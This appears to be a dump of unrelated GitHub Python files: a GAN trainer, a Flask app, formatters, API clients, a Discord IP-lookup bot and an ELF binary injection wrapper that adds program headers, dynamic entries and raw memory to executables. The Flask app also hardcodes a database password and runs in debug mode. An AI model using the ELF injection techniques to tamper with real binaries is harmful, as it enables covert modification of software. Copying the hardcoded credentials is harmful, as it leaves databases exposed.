self.optimizer_G = torch.optim.Adam(\n self.generator.parameters(),\n lr=self.lr,\n betas=(self.b1, self.b2)\n )\n\n self.optimizer_D = torch.optim.Adam(\n self.discriminator.parameters(),\n lr=self.lr,\n betas=(self.b1, self.b2)\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.train_set,\n batch_size=self.batch_size,\n shuffle=True\n )\n\n\n\n def train(self, 
verbose=0):\n for epoch in range(self.epochs):\n for n, real_samples in enumerate(self.train_loader):\n\n # data for training the discriminator\n real_samples_labels = torch.ones((self.batch_size, 1))\n latent_space_samples = torch.randn((self.batch_size, 5))\n gen_samples = self.generator(latent_space_samples)\n gen_sample_labels = torch.zeros((self.batch_size, 1))\n\n # make sure the real_sampeles and gen_samples are the same size\n if len(real_samples) != len(gen_samples):\n r_len, g_len = len(real_samples), len(gen_samples)\n length = min(r_len, g_len)\n real_samples = real_samples[:length]\n gen_samples = gen_samples[:length]\n real_samples_labels = real_samples_labels[:length]\n gen_sample_labels = gen_sample_labels[:length]\n\n all_samples = torch.cat((real_samples, gen_samples))\n all_sample_labels = torch.cat((\n real_samples_labels,\n gen_sample_labels\n ))\n\n\n # ---------------------\n # Train Discriminator\n # ---------------------\n\n self.discriminator.zero_grad()\n self.optimizer_D.zero_grad()\n\n output_D = self.discriminator(all_samples)\n\n loss_D = self.adversarial_loss(output_D, all_sample_labels)\n loss_D.backward()\n\n self.optimizer_D.step()\n\n # Clip weights of discriminator\n if self.clip_value is not None:\n for p in self.discriminator.parameters():\n p.data.clamp_(-self.clip_value, self.clip_value)\n\n # -----------------\n\n # data for training the generator\n \n if self.batch_size != len(real_samples):\n latent_space_samples = torch.randn((len(real_samples), 5))\n else:\n latent_space_samples = torch.randn((self.batch_size, 5))\n\n # -----------------\n # Train Generator\n # -----------------\n\n self.generator.zero_grad()\n self.optimizer_G.zero_grad()\n\n generated_samples = self.generator(latent_space_samples)\n output_D_generated = self.discriminator(generated_samples)\n\n loss_G = self.adversarial_loss(output_D_generated, real_samples_labels)\n\n loss_G.backward()\n self.optimizer_G.step()\n\n if verbose == 2:\n print(\n \"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]\"\n % (epoch+1, self.epochs, n, len(self.train_loader), loss_D.item(), loss_G.item())\n )\n \n if verbose == 1:\n print(\n \"[Epoch %d/%d] [D loss: %f] [G loss: %f]\"\n % (epoch+1, self.epochs, loss_D.item(), loss_G.item())\n )\n\n\n\n def sample(self, n_samples, plot=False):\n \"\"\"\n Generates n_samples of fake data\n \"\"\"\n noise = torch.randn(n_samples, 5).to(self.device)\n if plot:\n plt.plot(self.generator(noise).cpu().detach().numpy().T)\n plt.show()\n\n return self.generator(noise)\n \n\n def save_model(self, path):\n \"\"\"\n Save the model as a 'pt` file\n \"\"\"\n if not path.endswith('.pt'):\n path += '.pt'\n\n torch.save(self.generator.state_dict(), path)\n\n\ndef main():\n \n data = pd.read_csv('Data/real_returns.csv').drop('Unnamed: 0', axis=1).T\n\n d = {\n 'data': [data],\n 'train_size': [0.7, 0.8, 0.9, 0.95],\n 'epochs': [25, 50, 100, 200, 250, 300, 400, 500],\n 'batch_size': [32, 64, 128, 256, 512, 1024],\n 'lr': [0.0001, 0.0005, 0.001, 0.005, 0.01],\n 'b1': [0.5, 0.6, 0.7, 0.8, 0.9],\n 'b2': [0.9, 0.95, 0.99, 0.999, 0.9999, 0.99999],\n 'clip_value': [0.01, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, None],\n 'random_state': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n }\n\n\n for i in range(100):\n params = {}\n for k in d.keys():\n params[k] = random.choice(d[k])\n\n print(i+1)\n gan = GAN(**params)\n gan.train(full_verbose=True)\n samps = gan.sample(1000)\n samps = pd.DataFrame(samps.detach().numpy())\n samps.to_csv(f'Data/fake_returns_GAN_{i+1}.csv')\n 
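# Hedged usage sketch for the GAN class defined above (assumes the class is
# in scope in this module); the CSV path mirrors main() and the
# hyperparameter values are illustrative assumptions. Note that train()
# exposes the keyword `verbose` (0, 1 or 2), not `full_verbose`.
import pandas as pd

returns = pd.read_csv('Data/real_returns.csv').drop('Unnamed: 0', axis=1).T
gan = GAN(returns, epochs=100, batch_size=128, lr=0.001, random_state=0)
gan.train(verbose=1)
fake = gan.sample(1000)
pd.DataFrame(fake.detach().cpu().numpy()).to_csv('Data/fake_returns_sketch.csv')
gan.save_model('gan_sketch.pt')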
gan.save_model(f'model_{i+1}.pt')\n\n \n # print(gan.data.shape)\n # print(len(gan.train_set), len(gan.test_set[1]))\n # print(len(gan.test_set), len(gan.test_set[1]))\n # print(gan.discriminator)\n # print(gan.generator)\n gan.train(full_verbose=True)\n\n fake_data = gan.sample(100, plot=True)\n\n fake_data = pd.DataFrame(fake_data.detach().numpy())\n print(fake_data.shape)\n print(fake_data)\n fake_data.to_csv('Data/fake_returns_GAN.csv')\n\n gan.save_model('model.pt')\n\nif __name__ == '__main__':\n main()","repo_name":"rshea33/FA-691","sub_path":"Final Project/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":10200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74005295202","text":"# from operator import add\nimport os\nfrom flask import Flask, render_template, request\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom forms import SubmitAddressForm\n\napp = Flask(__name__)\ncsrf = CSRFProtect(app)\n\n# adding secret key to use csrf\nSECRET_KEY = os.urandom(32)\napp.config['SECRET_KEY'] = SECRET_KEY\n\n# setting the environments and configuring databases for the different environments\nENV = 'dev'\n\nif ENV == 'dev':\n app.debug = True\n app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:123456@localhost/user_addresses'\n\nelse:\n app.debug = False\n app.config['SQLALCHEMY_DATABASE_URI'] = ''\n\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass User_Addresses(db.Model):\n __tablename__ = 'ethereum_addresses'\n id = db.Column(db.Integer, primary_key=True)\n address = db.Column(db.String, unique=True)\n\ndb.create_all()\n\ndef __init__(self, address=\"\"):\n self.address = address\n\n@app.route('/')\ndef hello():\n return render_template(\"home.htm\")\n\n\n@app.route(\"/submit\", methods=[\"POST\", \"GET\"])\ndef submit_address():\n if request.method == 'POST':\n address = request.form['address']\n\n\n if len(address) < 6 or len(address) > 64:\n return render_template(\"home.htm\", message=\"Invalid address\")\n\n if db.session.query(User_Addresses).filter(User_Addresses.address == address).count() == 0:\n new_address = User_Addresses(address=address)\n print(new_address)\n db.session.add(new_address)\n db.session.commit()\n return render_template(\"submitted.htm\")\n\n else:\n return render_template(\"oops.htm\")\n return render_template(\"submitted.htm\")\n\nif __name__ == '__main__':\n app.run()","repo_name":"esemoney/win-money","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43681125169","text":"from prettytable import PrettyTable\n\ndef truncate(thing, length, suffix='...'):\n if len(thing) <= length:\n return thing\n return ' '.join(thing[:length+1].split(' ')[0:-1]) + suffix\n\ndef table_basic(conf, args, rows):\n if not rows:\n return\n headers = ['ID', 'Summary', 'Status', 'Link']\n real_rows = []\n table = PrettyTable(headers)\n table.align['ID'] = 'l'\n table.align['Summary'] = 'l'\n\n if 'truncate' not in args:\n args.truncate = 42\n\n for row in rows:\n this_row = [row.key, truncate(row.fields.summary, args.truncate), \"%s\" % row.fields.status, '%sbrowse/%s' % (conf['auth']['url'], row.key)]\n table.add_row(this_row)\n print(table)\n\ndef custom(conf, args, rows):\n table_headers = args.headers\n\n table = PrettyTable(table_headers)\n if 'align' in args:\n for key in 
args.align:\n table.align[key] = args.align[key]\n for row in rows:\n this_row = []\n for key in args.row_keys:\n this_row.append(row[key])\n table.add_row(this_row)\n print(table)\n\ndef grid(conf, args, rows):\n table = PrettyTable([])\n table.header = False\n for thing in rows:\n table.add_row([thing, rows[thing]])\n print(table)\n\ndef multiday_grid(conf, args, rows):\n headers = ['']\n for row in rows:\n headers.append(row['date'])\n row_headers = [key for key in rows[0].keys() if key != 'date']\n\n table = PrettyTable(headers)\n index = 0\n\n all_rows = []\n for row_header in row_headers:\n all_rows.append([row_header])\n\n for record in rows:\n row_index = 0\n for key in record.keys():\n if key == 'date':\n continue\n all_rows[row_index].append(record[key])\n row_index = row_index + 1\n index = index + 1\n\n for row in all_rows:\n table.add_row(row)\n\n # for row in rows:\n # this_row = []\n #\n # this_row.append(row_headers[index])\n # row_index = 0\n # for thing in row:\n # if thing == 'date':\n # continue\n # if row_index == index:\n # this_row.append(row[thing])\n # row_index = row_index + 1\n # index = index + 1\n # table.add_row(this_row)\n print(table)\n","repo_name":"robballou/harvesttool","sub_path":"harvesttool/formatter/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14098070817","text":"import requests\n\nrand_driver_idx = 0\n\n\ndef current_standings():\n r = requests.get(\"http://ergast.com/api/f1/current/driverStandings.json\")\n data = r.json()[\"MRData\"][\"StandingsTable\"][\"StandingsLists\"][0][\"DriverStandings\"][\n rand_driver_idx\n ][\"Driver\"]\n num = data[\"permanentNumber\"]\n fname = data[\"givenName\"]\n lname = data[\"familyName\"]\n code = data[\"code\"]\n output = f\"The current year's winner is number: {num}, {fname} {lname} ({code})! \"\n return output\n\n\ndef years_standings(year):\n if int(year) >= 2005:\n r = requests.get(f\"http://ergast.com/api/f1/{year}/driverStandings.json\")\n data = r.json()[\"MRData\"][\"StandingsTable\"][\"StandingsLists\"][0][\n \"DriverStandings\"\n ][rand_driver_idx][\"Driver\"]\n num = data[\"permanentNumber\"]\n fname = data[\"givenName\"]\n lname = data[\"familyName\"]\n code = data[\"code\"]\n output = f\"The winner in {year} is number: {num}, {fname} {lname} ({code})! \"\n else:\n output = \"Uhh... sorry we don't have this data :(\"\n return output\n","repo_name":"dai-anna/FantasyF1TeamGenerator","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15901132087","text":"from ._rawelf_injection import rawelf_injection\n\nfrom .Manipulators.DynamicManipulator import DYN_TAGS\n\n\nclass RawElfInjector:\n \"\"\"Injection technique supplement for LIEF\n\n CAUTION: Inserting new memory between a section and its\n references can break those references. E.g. .plt uses\n relative addressing for x86_64 PIEs. Appending a new entry\n to .dynamic for a \"classic\" gcc build will result in\n broken references to .got.\n\n CAUTION: Using this class will need the current working\n directory to be writable. 
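    Example (hedged sketch; the binary name, the DYN_TAGS member and all
    numeric values below are purely illustrative, not taken from the
    project; flags 0x5 is PF_R | PF_X as documented for overwritePhtEntry,
    and ptype 1 is the standard ELF PT_LOAD value):

        inj = RawElfInjector("./patched_elf")
        entry_offset = inj.appendDynamicEntry(tag=some_dyn_tag, value=0)
        inj.overwritePhtEntry(ptype=1, flags=0x5, offset=0x2000,
                              vaddr=0x2000, file_size=0x200,
                              mem_size=0x200, align=0x1000, index=3)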
This is due to the fact that\n the raw elf parser can only parse a file and is not able\n to take over LIEF's memory representation of the ELF file.\n Thus this class will use 'Binary.write' to store the\n state of the LIEF binary and then reopen the file with the\n raw parser. Eventually, after a function call, LIEF will\n again manage the binary.\n\n Attributes:\n inj (rawelf_injection.rawelf_injector): Provides\n missing injection techniques.\n\n \"\"\"\n\n __inj: rawelf_injection.rawelf_injector\n\n def __init__(self, binName):\n self.__inj = rawelf_injection.rawelf_injector(binName)\n if not self.__inj:\n raise RuntimeError(\"Failed to load {}\".format(binName))\n\n def appendDynamicEntry(self, tag: DYN_TAGS, value: int) -> int:\n \"\"\"Appends a .dynamic entry\n\n This function \"naively\" appends a new entry to\n .dynamic. Notice that with \"normal\" gcc builds, the\n .got section comes immediately after .dynamic. For\n x86_64 PIEs that use addressing of a form like\n \"[rip + ]\", this function will\n break the reference and most likely cause a crash.\n\n Args:\n tag (DYN_TAGS): Tag of the entry\n value (int): Value of the entry\n\n Returns:\n File offset of the new entry\n\n \"\"\"\n result = self.__inj.append_dynamic_entry(tag=tag, value=value)\n return result\n\n def overwriteDynamicEntry(\n self, new_tag: DYN_TAGS, new_value: int, index: int\n ) -> None:\n \"\"\"Overwrites a .dynamic entry\n\n Args:\n new_tag (DYN_TAGS): Tag of new entry\n new_value (int): Value of new entry\n index (int): Index of entry to overwrite\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.overwrite_dynamic_entry(\n tag=new_tag, value=new_value, index=index\n )\n return result\n\n def appendPhtEntry(\n self,\n ptype: int,\n flags: int,\n offset: int,\n vaddr: int,\n file_size: int,\n mem_size: int,\n align: int,\n ) -> int:\n \"\"\"Appends a new PHT entry to PHT\n\n Args:\n ptype (int): Type of the segment\n flags (int): Access rights for described segment.\n Either PF_X(0x1), PF_W(0x2), PF_R(0x4) or a\n combination of those.\n offset (int): File offset of described segment.\n vaddr (int): Virtual address of described segment.\n file_size (int): Size of segment in file.\n mem_size (int): Size of segment in process image.\n align (int): Alignment s.t. offset = vaddr mod\n align.\n\n Returns:\n Offset of appended PHT entry.\n\n \"\"\"\n result = self.__inj.append_pht_entry(\n ptype=ptype,\n flags=flags,\n offset=offset,\n vaddr=vaddr,\n file_size=file_size,\n mem_size=mem_size,\n align=align,\n )\n return result\n\n def overwritePhtEntry(\n self,\n ptype: int,\n flags: int,\n offset: int,\n vaddr: int,\n file_size: int,\n mem_size: int,\n align: int,\n index: int,\n ) -> None:\n \"\"\"Overwrites an existing PHT entry\n\n Args:\n ptype (int): Type of the segment\n flags (int): Access rights for described segment.\n Either PF_X(0x1), PF_W(0x2), PF_R(0x4) or a\n combination of those.\n offset (int): File offset of described segment.\n vaddr (int): Virtual address of described segment.\n file_size (int): Size of segment in file.\n mem_size (int): Size of segment in process image.\n align (int): Alignment s.t. 
offset = vaddr mod\n align.\n index (int): Index of PHT entry to overwrite.\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.overwrite_pht_entry(\n ptype=ptype,\n flags=flags,\n offset=offset,\n vaddr=vaddr,\n file_size=file_size,\n mem_size=mem_size,\n align=align,\n index=index,\n )\n return result\n\n def overwriteMemory(self, offset: int, buffer: bytes) -> None:\n \"\"\"Overwrites specified memory region\n\n The size of the memory region to overwrite is\n indirectly given by the length of 'buffer'.\n\n Args:\n offset (int): File offset of memory region to\n overwrite\n buffer (bytes): Bytes to write into memory region\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.overwrite_memory(offset=offset, buffer=buffer)\n return result\n\n def insertMemory(self, offset: int, buffer: bytes) -> None:\n \"\"\"Inserts new memory into specified region\n\n The amount of bytes to be inserted is given implicitly\n by the length of 'buffer'.\n\n Inserting memory can break cross - references.\n\n Args:\n offset (int): File offset that specifies where to\n \"open a gap\" and to fill that gap with given buffer.\n buffer (bytes): Bytes to write into gap.\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.insert_memory(offset=offset, buffer=buffer)\n\n return result\n","repo_name":"fkie-cad/ELFbin","sub_path":"injection/src/ElfInjection/RawElfInjection.py","file_name":"RawElfInjection.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2430077455","text":"import pandas as pd\nimport numpy as np\n\ntypes = {'Semana': np.uint8,'Cliente_ID': np.uint16, 'Producto_ID': np.uint16,\n'Demanda_uni_equil': np.uint8}\ntypes2 = {'Cliente_ID': np.uint16, 'Producto_ID': np.uint16}\n\ndftrain = pd.read_csv('../input/train.csv', usecols=types.keys(), dtype=types)\ndftest = pd.read_csv('../input/test.csv',skiprows=0, nrows=1000)\nprint(dftest.head(2))\ndftest['predict']=\"\"\nnumrows =0\nprint(dftest.head(2))\nfor index, row in dftest.iterrows():\n if(numrows%100==0):\n print(numrows)\n numrows+=1\n week = int(row[1])\n ClientId = int(row[5])\n ProductID = int(row[6])\n avg1=0\n avg2=0\n avg3=0\n count1=0\n count2=0\n count3=0\n if week==10:\n \n temp = dftrain[dftrain['Semana'] == week-1]\n temp2 = temp[temp['Cliente_ID'] == ClientId]\n temp3=temp2[temp2['Producto_ID']== ProductID]\n if not temp3.empty:\n avg1 = temp3[\"Demanda_uni_equil\"].mean()\n count1=len(temp3[\"Demanda_uni_equil\"])\n \n dftest.loc[index, 'predict'] = avg1+avg2+avg3\n \n if week==11:\n \n temp = dftrain[dftrain['Semana'] == week-2]\n temp2 = temp[temp['Cliente_ID'] == ClientId]\n temp3=temp2[temp2['Producto_ID']== ProductID]\n if not temp3.empty:\n avg1 = temp3[\"Demanda_uni_equil\"].mean()\n count1=len(temp3[\"Demanda_uni_equil\"])\n \n dftest.loc[index, 'predict'] = avg1+avg2+avg3\n \ndftest.to_csv(\"2.csv\",index = False) \n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/grupo-bimbo-inventory-demand/Lahiru Madushanka/small-change.py","file_name":"small-change.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"42712432019","text":"import os\nimport csv\nimport re\nimport datetime\n\nimport config\n\ncurrent_directory = os.path.dirname(os.path.abspath(__file__))\n\ntoday_str = datetime.datetime.now()\ntoday_str = today_str.strftime('%d%b%Y')\n\nCSV_HEADERS = ['firstname', 'lastname', 'email']\n\n\ndef 
process_folder(input_folder, file_source, output_paths):\n\n target_path = input_folder\n csvfiles = [f for f in os.listdir(target_path) if f.endswith('.csv')]\n\n if not csvfiles:\n print(\"Couldn't find any CSV files in\", target_path, \":(\\nMoving on...\\n\")\n return\n\n total = 0\n total_edm_contacts = 0\n edm_contacts = []\n\n row_process_mapping = {\n 'toreta': process_toreta_row,\n 'camcard': process_camcard_row,\n 'chope': process_chope_row,\n }\n process_row_fn = row_process_mapping[file_source]\n\n # count users with emails\n # remove unnecessary columns to prevent errors in uploads\n for csvfile in csvfiles:\n csv_path = os.path.join(target_path, csvfile)\n with open(csv_path, newline='', encoding='Windows-1252') as _csvfile:\n rows = csv.DictReader(_csvfile, delimiter=',', quotechar='\"')\n for row in rows:\n total += 1\n contact = process_row_fn(row)\n if contact:\n total_edm_contacts += 1\n edm_contacts.append(contact)\n\n print('Processed \"{}\" and found {} users, {} with Emails! Writing to files...'.format(_csvfile.name, total, total_edm_contacts))\n\n for output_path in output_paths:\n # Write to combined file\n with open(output_path, 'a', newline='') as _csvfile:\n writer = csv.DictWriter(_csvfile, CSV_HEADERS)\n writer.writerows(edm_contacts)\n\n print('Appended to', output_paths, '\\n')\n\n\ndef process_toreta_row(row):\n # check for users with email1\n if row['email1']:\n return {\n 'firstname': row['first_name'],\n 'lastname': row['last_name'],\n 'email': row['email1'],\n }\n else:\n return None\n\n\ndef process_chope_row(row):\n # check for users with email1\n if row['Email Address']:\n return {\n 'firstname': row['Diner Name'],\n 'email': row['Email Address'],\n }\n else:\n return None\n\n\ndef process_camcard_row(row):\n # email may have multiple values\n email = None\n emails = re.findall(\"[\\w\\-][\\w\\-\\.]+@[\\w\\-][\\w\\-\\.]+[a-zA-Z]{1,4}\", row['Email'])\n if emails:\n email = emails[0]\n\n # check for users with email1\n if email:\n return {\n 'firstname': row['First Name'],\n 'lastname': row['Last Name'],\n 'email': email,\n }\n else:\n return None\n\n\ndef clear_upload_files():\n files = os.listdir(path=config.UPLOAD_FILES_DIR)\n for f in files:\n with open('{}/{}'.format(config.UPLOAD_FILES_DIR, f), 'w+', newline='') as _csvfile:\n writer = csv.DictWriter(_csvfile, CSV_HEADERS)\n writer.writeheader()\n\n print('Emptied these files:', files, '\\n')\n","repo_name":"wasabigeek/toretaToBenchmark","sub_path":"utils/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9124053680","text":"def print2D(table):\n for i in range(len(table)):\n for j in range(len(table[i])):\n print(table[i][j], end=\" \")\n print()\n\n\ndef countSubstrings(s: str) -> int:\n # initialize NxN dynamic programming table\n dpTable = [[False for i in range(len(s))] for j in range(len(s))]\n count = 0\n # bottom-up fill in dynamic table\n # True if substring[i:j+1] is a palindrome\n # always True for length 1\n # always False when j < i\n # when length = 2, true if s[i] is same as s[j]\n # for any others, True iff s[i] == s[j] and dpTable[i+1][j-1] is also True\n for i in range(len(s)-1, -1, -1):\n for j in range(len(s)-1, -1, -1):\n if i == j:\n dpTable[i][j] = True\n count += 1\n elif i > j:\n dpTable[i][j] = False\n elif i+1 == j and s[i] == s[j]:\n dpTable[i][j] = True\n count += 1\n elif s[i] == s[j] and dpTable[i+1][j-1]:\n dpTable[i][j] = True\n 
count += 1\n print2D(dpTable)\n\n return count\n\n\n# test driver\ninput = \"abc\"\nprint(\"Input:\", input)\nprint(\"Output:\", countSubstrings(input))\nprint()\n\ninput = \"aaa\"\nprint(\"Input:\", input)\nprint(\"Output:\", countSubstrings(input))\nprint()\n\ninput = \"aababba\"\nprint(\"Input:\", input)\nprint(\"Output:\", countSubstrings(input))\nprint()\n","repo_name":"minhyeong-joe/leetcode-challenge","sub_path":"DynamicProgramming/PalindromicSubstrings/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39691007817","text":"#=================Sonic the Cyber Warrior============================\r\n#Made for Educational Purposes, not responsible for your actions!!!!\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\nimport socket\r\nimport pygeoip\r\nimport requests\r\n\r\n#===================Sonic the Cyber Warrior======================\r\n\r\nbot = commands.Bot(command_prefix='?')\r\nbot.remove_command('help')\r\ntoken = ''\r\n\r\n#======================Sonic the Cyber Warrior====================\r\n\r\n@bot.event\r\nasync def on_ready():\r\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name=\"Ip LookUp | use prefix: ?\"))\r\n print('Bot is ready.')\r\n\r\ngip = pygeoip.GeoIP(str('GeoLiteCity.dat'))\r\n\r\narray1 = []\r\n\r\nclass iplookup():\r\n async def lookup_class(self, *, arg):\r\n array1.clear()\r\n x = str(input())\r\n y = array1.append(x)\r\n return '{}'.format(y,arg)\r\n\r\n@bot.command()\r\nasync def lookup(ctx, *, request=str(iplookup)):\r\n res = gip.record_by_addr(request)\r\n for key,val in res.items():\r\n await ctx.send('%s : %s' % (key,val))\r\n\r\n@bot.command()\r\nasync def ip(ctx, *, question):\r\n b = socket.gethostbyname(question)\r\n await ctx.send(f'{question} ip address: {b}')\r\n\r\n#=======================Sonic the Cyber Warrior=====================\r\n\r\nbot.run(token)\r\n","repo_name":"s0n1c268/IpLookUpBot","sub_path":"IpLookUpBot.py","file_name":"IpLookUpBot.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15474056859","text":"class Employee:\n def __init__(self,emp_Id,emp_name,__emp_salary, emp_dep):\n self.emp_Id = emp_Id\n self.emp_name =emp_name\n self.__emp_salary = __emp_salary\n self.__emp_dep = emp_dep #by addign __ meaning we are changing the class instant from public to private\n def calculate_emp_salary(self,hoursWorked):\n if hoursWorked > 50:\n overtime = hoursWorked-50\n Overtime_amount = (overtime*(self.__emp_salary/50))\n return Overtime_amount\n else:\n return self.__emp_salary\n \n return __emp_salary\n def set_emp_assign_dep (self,newDep):\n self.__emp_dep = newDep\n def print_emp_details(self):\n return \"employee name : {} employee ID : {} employee dep : {} employee salary : {}\".format(self.emp_name,self.emp_Id,self.__emp_dep,self.__emp_salary)\n \nemp1= Employee(\"E787\",\"ADAMS\",50000,\"ACCOUNTING\")\nemp2= Employee(\"E7499\",\"JONES\",45000,\"RESEARCH\")\nemp3= Employee(\"E7900\",\"MARTIN\",50000,\"SALES\")\nemp4= Employee(\"E7698\",\"SMITH\",55000,\"OPERATIONS\")\nprint (emp1.print_emp_details())\nprint (emp2.print_emp_details())\nprint (emp3.print_emp_details())\nprint (emp4.print_emp_details())\n\nemp4.set_emp_assign_dep(\"HR\")\nprint (emp1.calculate_emp_salary(20))\nprint (emp2.calculate_emp_salary(50))\nprint 
(emp3.calculate_emp_salary(70))\nprint (emp4.calculate_emp_salary(30))\n\n\n\n\n \n \n \n \n ","repo_name":"SumaiyaMaqbool/SumaiyaCodeAcademy","sub_path":"WK3Day1EmployeeClasses.py","file_name":"WK3Day1EmployeeClasses.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20691841915","text":"from binascii import hexlify, unhexlify\nfrom itertools import islice\nfrom operator import itemgetter\nimport re, sys\nfrom struct import pack, unpack\n\n\nclass Error(Exception): pass\nclass InvalidRecordError(Error): pass\nclass RecordClashError(Error): pass\nclass ArgumentError(Error): pass\nclass InputFileError(Error): pass\nclass InputRecordError(Error): pass\n\n\nclass BinaryAppDataStore(object):\n \"\"\" A store for binary application data.\n \"\"\"\n def __init__(self):\n self.r = _DataRecords()\n self.start_address = 0\n\n def record(self, i):\n \"\"\" Access the i-th record in the store.\n A (start address, data) tuple is returned.\n\n Accessing a non-existent record will throw IndexError\n \"\"\"\n return self.r.record(i)\n\n def num_records(self):\n \"\"\" Number of records in the store\n \"\"\"\n return self.r.num_records()\n\n def records(self):\n \"\"\" Iterate over the records. Each item is a tuple\n (start address, data).\n\n Example:\n\n b = BinaryAppData()\n ... # add some records or file data\n\n for rec_addr, rec_data in b.records():\n # rec_addr holds the start address of the\n # record, and rec_data is the record data\n \"\"\"\n return self.r.records()\n\n def iter_addr_data(self):\n \"\"\" Iterate over (address, data) pairs of all the contents\n of the store.\n\n Example:\n\n for (addr, data) in b.iter_addr_data():\n print \"At %s, data is %s\" % (addr, data)\n \"\"\"\n for rec_addr, rec_data in self.records():\n for offset in range(len(rec_data)):\n yield (rec_addr + offset, rec_data[offset])\n\n def __iter__(self):\n \"\"\" Iterate over the store's data contents.\n\n Example:\n\n for data_byte in b:\n print data_byte\n\n Note that it returns only the data bytes, without\n their addresses. To iterate over (addr, data) pairs\n use iter_addr_data()\n \"\"\"\n return iter(map(itemgetter(1), self.iter_addr_data()))\n\n def __len__(self):\n \"\"\" The total amount of data in the store\n \"\"\"\n return len(self.r)\n\n def __getitem__(self, addr):\n \"\"\" Data item retrieval (by address) from the store.\n Given a store b, b[addr] retrieves the data item at\n 'addr'.\n\n Raises IndexError when the store has no such address\n \"\"\"\n return self.r[addr]\n\n def add_record(self, address, data, merge=False):\n \"\"\" Directly add a record to the data store.\n The record has a start address and a data string.\n\n If merge is True, will try to merge the new record\n with its neighbors, if applicable (if the new record\n and one or both of its neighbors form a consecutive\n record).\n \"\"\"\n self.r.add_record(address, data, merge)\n\n\nclass DataFormatterBinary(object):\n \"\"\" Formatter for raw binary data.\n \"\"\"\n def __init__(self, data=None):\n self.data = data or BinaryAppDataStore()\n\n def read(self, str=None, filename=None, addr=0):\n \"\"\" Read binary data and return a store object. The data\n store is also saved in the interal 'data' attribute.\n\n The data can either be taken from a string (str\n argument) or a file (provide a filename, which will\n be read in binary mode). If both are provided, the str\n will be used. 
If neither is provided, an ArgumentError\n is raised.\n\n Optionally, you can provide a destination address for\n the data. If none is provided, 0 will be used.\n\n Note: if the store already contains data, this\n operation may result in a RecordClashError.\n \"\"\"\n if str is None:\n if filename is None:\n raise ArgumentError('Please supply a string or a filename')\n\n file = open(filename, 'rb')\n str = file.read()\n file.close()\n\n self.data = BinaryAppDataStore()\n self.data.add_record(addr, str, merge=True)\n return self.data\n\n def write(self, filename=None, padbyte=None, padtosize=None):\n \"\"\" Writes the internal store in binary format.\n\n If a filename is provided, the data is written to the\n named file. Otherwise, the data is returned as a\n string.\n\n Padding:\n\n The records in the data store might be inconsecutive,\n so the output will have to be padded. The padding\n is applied:\n - Before the first record, if it doesn't start at 0\n - Between inconsecutive records\n - After the last record and up until padtosize, if\n that is provided (padtosize is ignored if no\n padbyte is given)\n\n If padbyte isn't provided, no padding will be done.\n If padbyte is provided, it will be taken as a single\n byte stored in a string (for example 'a' or '\\x61').\n\n Warning: if the records in your data store don't begin\n at 0 or aren't consecutive, beware of padding. A\n single record beginning at 50,000,000 and having two\n bytes will result in a 50-Meg file.\n \"\"\"\n str = _datastore2string(self.data, padbyte, padtosize)\n\n if filename:\n file = open(filename, 'wb')\n file.write(str)\n file.close()\n else:\n return str\n\n\nclass DataFormatterHexpair(object):\n \"\"\" Formatter for hexpair data.\n \"\"\"\n def __init__(self, data=None):\n self.data = data or BinaryAppDataStore()\n\n def read(self, str=None, filename=None, addr=0):\n \"\"\" Works similarly to read() in DataFormatterBinary.\n\n In addition, may throw InputFileError if the input\n file is not formatted correctly.\n \"\"\"\n if str is None:\n if filename is None:\n raise ArgumentError('Please supply a string or a filename')\n\n file = open(filename, 'r')\n str = file.read()\n file.close()\n\n # remove all the separators\n str = re.sub('[^a-fA-F0-9]', '', str)\n\n try:\n data = unhexlify(str)\n except TypeError:\n err = sys.exc_info()[1]\n raise InputFileError('hexpair string invalid: %s' % err.message)\n\n self.data = BinaryAppDataStore()\n self.data.add_record(addr, data, merge=True)\n return self.data\n\n def write(self, filename=None, padbyte=None, padtosize=None,\n linelength=80, separator=' '):\n \"\"\" Works similarly to DataFormatterBinary.write(),\n with some of extra parameters.\n\n linelength:\n The output will be split to lines with maximum\n linelength characters (including the separators,\n but not including newlines).\n If negative, output will be 